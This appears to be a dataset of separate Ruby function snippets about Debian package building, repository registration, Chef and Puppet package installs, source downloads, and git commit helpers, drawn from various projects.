"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def unpack_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n sudo <<-SUDO\n sh -c '\n cd #{src_dir};\n test -d #{package_dir}.old && rm -fr #{package_dir}.old;\n test -d #{package_dir} && mv #{package_dir} #{package_dir}.old;\n #{src_package[:unpack]}\n chgrp -R #{group} #{package_dir}; \n chmod -R g+w #{package_dir};\n '\n SUDO\n end",
"def commit(msg = nil)\n require_dep! 'awesome_spawn'\n require_cmd! git_cmd\n\n in_repo { AwesomeSpawn.run \"#{git_cmd} add #{pkg_files.join(' ')}\" }\n super(msg.nil? ? \"updated to #{version}\" : msg)\n self\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def commit(opts = {:use_dirstate => true, :update_dirstate => true})\n valid = false # don't update the DirState if this is set!\n \n commit = ((modified || []) + (added || [])).sort\n remove = removed\n xtra = extra.dup\n branchname = xtra[\"branch\"]\n text = description\n \n p1, p2 = parents.map {|p| p.node }\n c1 = repo.changelog.read(p1) # 1 parent's changeset as an array\n c2 = repo.changelog.read(p2) # 2nd parent's changeset as an array\n m1 = repo.manifest.read(c1[0]).dup # 1st parent's manifest\n m2 = repo.manifest.read(c2[0]) # 2nd parent's manifest\n \n if opts[:use_dirstate]\n oldname = c1[5][\"branch\"]\n tests = [ commit.empty?, remove.empty?, !opts[:force],\n p2 == NULL_ID, branchname == oldname ]\n if tests.all?\n UI::status \"nothing changed\"\n return nil\n end\n end\n \n xp1 = p1.hexlify\n xp2 = p2 == NULL_ID ? \"\" : p2.hexlify\n \n Hook.run_hook :pre_commit\n journal = Amp::Mercurial::Journal.new(:opener => repo.store_opener)\n \n fresh = {} # new = reserved haha i don't know why someone wrote \"haha\"\n changed = []\n link_rev = repo.size\n \n (commit + (remove || [])).each {|file| UI::status file }\n \n # foreach file in commit:\n # commit_file file\n # end\n commit.each do |file|\n versioned_file = self[file]\n fresh[file] = versioned_file.commit :manifests => [m1, m2],\n :link_revision => link_rev,\n :journal => journal ,\n :changed => changed\n \n new_flags = versioned_file.flags\n \n # TODO\n # Clean this shit up\n if [ changed.empty? || changed.last != file, \n m2[file] != fresh[file]\n ].all?\n changed << file if m1.flags[file] != new_flags\n end\n m1.flags[file] = new_flags\n \n repo.staging_area.normal file if opts[:use_dirstate]\n end\n \n # add_manifest_entry\n man_entry, updated, added = *add_manifest_entry(:manifests => [m1, m2],\n :changesets => [c1, c2],\n :journal => journal ,\n :link_rev => link_rev,\n :fresh => fresh ,\n :remove => remove ,\n :changed => changed )\n\n # get_commit_text\n text = get_commit_text text, :added => added, :updated => updated,\n :removed => removed, :user => user ,\n :empty_ok => opts[:empty_ok] ,\n :use_dirstate => opts[:use_dirstate]\n \n # atomically write to the changelog\n # add_changelog_entry\n # for the unenlightened, rents = 'rents = parents\n new_rents = add_changelog_entry :manifest_entry => man_entry,\n :files => (changed + removed),\n :text => text,\n :journal => journal,\n :parents => [p1, p2],\n :user => user,\n :date => date,\n :extra => xtra\n \n \n # Write the dirstate if it needs to be updated\n # basically just bring it up to speed\n if opts[:use_dirstate] || opts[:update_dirstate]\n repo.dirstate.parents = new_rents\n removed.each {|f| repo.dirstate.forget(f) } if opts[:use_dirstate]\n repo.staging_area.save\n end\n \n # The journal and dirstates are awesome. Leave them be.\n valid = true\n journal.close\n \n # if an error and we've gotten this far, then the journal is complete\n # and it deserves to stay (if an error is thrown and journal isn't nil,\n # the rescue will destroy it)\n journal = nil\n \n # Run any hooks\n Hook.run_hook :post_commit, :added => added, :modified => updated, :removed => removed, \n :user => user, :date => date, :text => text,\n :revision => repo.changelog.index_size\n return new_rents\n rescue StandardError => e\n if !valid\n repo.dirstate.invalidate!\n end\n if e.kind_of?(AbortError)\n UI::warn \"Abort: #{e}\"\n else\n UI::warn \"Got exception while committing. 
#{e}\"\n UI::warn e.backtrace.join(\"\\n\")\n end\n \n # the journal is a vestigial and incomplete file.\n # destroyzzzzzzzzzzz\n journal.delete if journal\n end",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def upgrade_direct!\n remote_file local_path do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n dpkg_package local_path\n end",
"def download_src(src_package, src_dir)\n deprec.groupadd(group)\n sudo \"test -d #{src_dir} || sudo mkdir #{src_dir}\" \n sudo \"chgrp -R #{group} #{src_dir}\"\n sudo \"chmod -R g+w #{src_dir}\"\n # XXX check if file exists and if we have and MD5 hash or bytecount to compare against\n # XXX if so, compare and decide if we need to download again\n if defined?(src_package[:md5sum])\n md5_clause = \" && echo '#{src_package[:md5sum]}' | md5sum -c - \"\n end\n sudo <<-SUDO\n sh -c \"cd #{src_dir} && test -f #{src_package[:file]} #{md5_clause} || wget --timestamping #{src_package[:url]}\"\n SUDO\n end",
"def update\n `cd #{__dir__} && git pull origin master`\n install\nend",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def install_from_src(src_package, src_dir)\n package_dir = File.join(src_dir, src_package[:dir])\n unpack_src(src_package, src_dir)\n sudo <<-SUDO\n sh -c '\n cd #{package_dir};\n #{src_package[:configure]}\n #{src_package[:make]}\n #{src_package[:install]}\n #{src_package[:post_install]}\n '\n SUDO\n end",
"def pkg_update\n pkg_fetch unless File::exists? @srcdir\n\n sysprint \"#{@name} update: #{@fetch_url}\"\n\n protocol = @fetch_url.split(':')\n\n if protocol.length == 0\n syserr \"Invalid package source URL #{@fetch_url}\"\n raise\n end\n\n case protocol\n when /^http$/i, /^https$/i, /^ftp$/i\n sysprint \"#{@name}: can't update from protocol #{protocol}\"\n when /git/i\n git_update(@fetch_url)\n else\n syserr \"Unhandled URL type: #{protocol}\"\n raise\n end\n end",
"def with_package_source(source_url, source_repos = [], options = {})\n source_prefix = options[:source] ? 'deb-src' : 'deb'\n source_patterns = [source_prefix, source_url] + source_repos \n \n source_contents = File.read '/etc/apt/sources.list'\n sources = source_contents.split(/(\\r|\\n)+/)\n source_exists = sources.any? do |source_line|\n source_frags = source_line.split(' ')\n source_patterns.all? { |pattern| source_frags.any? { |frag| frag == pattern } }\n end\n\n unless source_exists\n File.open('/etc/apt/sources.list', 'a') do |f|\n f.write \"#{source_prefix} #{source_url} #{source_repos.join(' ')}\\n\"\n end\n update_package_metadata\n end\n \n begin\n yield\n ensure\n unless source_exists\n File.open('/etc/apt/sources.list', 'w') { |f| f.write source_contents }\n update_package_metadata \n end\n end\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def linux_commit(c)\n\tgit = Git.open(project: 'linux')\n\tgit.gcommit(c)\nend",
"def update_datapackage\n update_file_in_repo(\"datapackage.json\", create_json_datapackage)\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def push_package!\n require 'packagecloud'\n pkg = Packagecloud::Package.new(file: package_file)\n client.put_package('duo-openvpn', pkg, distro_id)\n end",
"def install(pkg_name)\n begin\n pkg_build_dir = packaging_dir(pkg_name)\n filepath = Dir.glob(\"#{pkg_build_dir}/*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file found for #{pkg_name} in #{pkg_build_dir}: #{filepath}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{pkg_build_dir}: #{filepath}\"\n else\n filepath = filepath.first\n Packager.info \"Found package: #{filepath}\"\n end\n install_debfile(filepath)\n rescue Exception => e\n raise RuntimeError, \"Installation of package '#{pkg_name} failed -- #{e}\"\n end\n end",
"def update\n Puppet.debug(\"Debconf: updating #{resource[:name]}\")\n\n # Build the string to send\n args = [:package, :item, :type, :value].map { |e| resource[e] }.join(' ')\n\n IO.popen('/usr/bin/debconf-set-selections', 'w+') do |pipe|\n Puppet.debug(\"Debconf: debconf-set-selections #{args}\")\n pipe.puts(args)\n\n # Ignore remaining output from command\n pipe.close_write\n pipe.read(nil)\n end\n end",
"def create_package(sub_path)\n package = Tempfile.new(@commit_hash)\n @logger.info \"Creating #{package.path}\"\n Dir.chdir(@source_location + '/' + sub_path) do\n # add a commit_hash file whose contents represent the key for this package\n IO.write('commit_hash', @commit_hash)\n RakeUtils.system \"tar -zcf #{package.path} *\"\n end\n @logger.info 'Created'\n package\n end",
"def set_version(version, rootdir = Dir.pwd, options = {})\n exit_status = 0\n type = (options[:type]) ? options[:type] : FalkorLib.config[:versioning][:type]\n source = (options[:source]) ? options[:source] : FalkorLib.config[:versioning][:source][ type ]\n versionfile = File.join( rootdir, source[:filename] ) unless source[:filename].nil?\n major, minor, patch = major(version), minor(version), patch(version)\n #tocommit = \"\"\n case type\n when 'file'\n info \"writing version changes in #{source[:filename]}\"\n File.open(versionfile, 'w') { |f| f.puts version } #if File.exist? ( versionfile )\n when 'gem'\n info \"=> writing version changes in #{source[:filename]}\"\n File.open(versionfile, 'r+') do |f|\n text = f.read\n text.gsub!(/^(\\s*)MAJOR\\s*,\\s*MINOR,\\s*PATCH\\s*=\\s*(\\d+)\\s*,\\s*(\\d+)\\s*,\\s*(\\d+)(.*)$/,\n '\\1' + \"MAJOR, MINOR, PATCH = #{major}, #{minor}, #{patch}\" + '\\5')\n f.rewind\n f.write(text)\n end\n when 'puppet_module'\n info \"=> writing version changes in #{source[:filename]}\"\n metadata = JSON.parse( IO.read( versionfile ) )\n metadata[\"version\"] = version\n File.open(versionfile, \"w\") do |f|\n f.write JSON.pretty_generate( metadata )\n end\n #exit 1\n end\n if FalkorLib::Git.init?(rootdir)\n filelist = FalkorLib::Git.list_files( rootdir )\n Dir.chdir( rootdir ) do\n next if source[:filename].nil?\n unless filelist.include?( source[:filename] )\n warning \"The version file #{source[:filename]} is not part of the Git repository\"\n answer = ask(\"Adding the file to the repository? (Y|n)\", 'Yes')\n next if answer =~ /n.*/i\n exit_status = FalkorLib::Git.add(versionfile, \"Adding the version file '#{source[:filename]}', inialized to the '#{version}' version\" )\n next\n end\n run %( git diff #{source[:filename]} )\n answer = ask(cyan(\"=> Commit the changes of the version file to the repository? (Y|n)\"), 'Yes')\n next if answer =~ /n.*/i\n run %( git commit -s -m \"bump to version '#{version}'\" #{source[:filename]} )\n exit_status = $?.to_i\n # if (type == 'gem' && File.exists?(File.join(rootdir, 'Gemfile')) )\n # run %{\n # sleep 2\n # bundle update falkorlib\n # git commit -s -m \"Update Gemfile.lock accordingly\" Gemfile.lock\n # } if command?( 'bundle' )\n # end\n end\n end\n exit_status\n end",
"def git_update(target)\n cmd = \"git fetch\"\n\n FileUtils.cd(target) do\n sysexec(cmd)\n end\nend",
"def run_dpkg(tmp_dir, k_id)\n self.populate_package tmp_dir\n (key = \"-k#{k_id}\") unless k_id == \"\"\n stdout = `dpkg-buildpackage -rfakeroot #{key} 2>&1`\n ActiveRecord::Base.logger.debug stdout \n if $?.success?\n true\n else\n false\n end \n end",
"def install_dmd(source, file, build_dir, prefix)\n remote_file \"#{Chef::Config[:file_cache_path]}/#{file}\" do\n source source + file\n mode '0644'\n action :create_if_missing\n not_if \"test -e #{prefix}/linux/bin64/dmd\"\n end\n\n bash \"install-#{build_dir}\" do\n user 'root'\n cwd Chef::Config[:file_cache_path]\n\n code <<-EOH\n set -e\n\n rm -r #{build_dir} || true\n tar xf #{file}\n\n rm -r #{prefix} || true\n cp -r #{build_dir} #{prefix}\n rm -r #{build_dir}\n EOH\n\n not_if \"test -e #{prefix}/linux/bin64/dmd\"\n end\nend",
"def commit\n system(\"cd #{repo_path};git commit -m 'to the cloud'\")\n end",
"def upgrade_package(name, cmdline_args = '', opts = {})\n case self['platform']\n when /sles-/\n execute(\"zypper --non-interactive --no-gpg-checks up #{name}\", opts)\n when /el-4/\n @logger.debug(\"Package upgrade is not supported on rhel4\")\n when /fedora-22/\n execute(\"dnf -y #{cmdline_args} update #{name}\", opts)\n when /cisco|fedora|centos|eos|el-/\n execute(\"yum -y #{cmdline_args} update #{name}\", opts)\n when /ubuntu|debian|cumulus/\n update_apt_if_needed\n execute(\"apt-get install -o Dpkg::Options::='--force-confold' #{cmdline_args} -y --force-yes #{name}\", opts)\n when /solaris-11/\n execute(\"pkg #{cmdline_args} update #{name}\", opts)\n when /solaris-10/\n execute(\"pkgutil -u -y #{cmdline_args} ${name}\", opts)\n else\n raise \"Package #{name} cannot be upgraded on #{self}\"\n end\n end",
"def setup debian_repository\n write_config debian_repository\n restart\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def install_fake_pkg(name)\n require_relative 'ci-tooling/lib/dpkg'\n Dir.mktmpdir do |tmpdir|\n Dir.chdir(tmpdir) do\n FileUtils.mkpath(\"#{name}/DEBIAN\")\n File.write(\"#{name}/DEBIAN/control\", <<-EOF.gsub(/^\\s+/, ''))\n Package: #{name}\n Version: 999:999\n Architecture: all\n Maintainer: Harald Sitter <sitter@kde.org>\n Description: fake override package for kubuntu ci install checks\n EOF\n system(\"dpkg-deb -b #{name} #{name}.deb\")\n DPKG.dpkg(['-i', \"#{name}.deb\"])\n end\n end\nend",
"def upgrade_package(name, cmdline_args = '', opts = {})\n case self['platform']\n when /opensuse|sles-/\n execute(\"zypper --non-interactive --no-gpg-checks up #{name}\", opts)\n when /el-4/\n @logger.debug(\"Package upgrade is not supported on rhel4\")\n when /fedora-(2[2-9]|3[0-9])/\n execute(\"dnf -y #{cmdline_args} update #{name}\", opts)\n when /cisco|fedora|centos|redhat|eos|el-/\n execute(\"yum -y #{cmdline_args} update #{name}\", opts)\n when /ubuntu|debian|cumulus|huaweios/\n update_apt_if_needed\n execute(\"apt-get install -o Dpkg::Options::='--force-confold' #{cmdline_args} -y --force-yes #{name}\", opts)\n when /solaris-11/\n if opts[:acceptable_exit_codes]\n opts[:acceptable_exit_codes] << 4\n else\n opts[:acceptable_exit_codes] = [0, 4] unless opts[:accept_all_exit_codes]\n end\n execute(\"pkg #{cmdline_args} update #{name}\", opts)\n when /solaris-10/\n execute(\"pkgutil -u -y #{cmdline_args} #{name}\", opts)\n else\n raise \"Package #{name} cannot be upgraded on #{self}\"\n end\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def after_source_download\n Dir.chdir cachedir/name do\n sh \"git checkout #{version}\"\n sh 'git submodule update --init'\n end\n end",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend",
"def commit_changes(description)\n git :add => '-A'\n git :commit => %Q(-qm \"thegarage-template: [#{@current_recipe}] #{description}\")\nend",
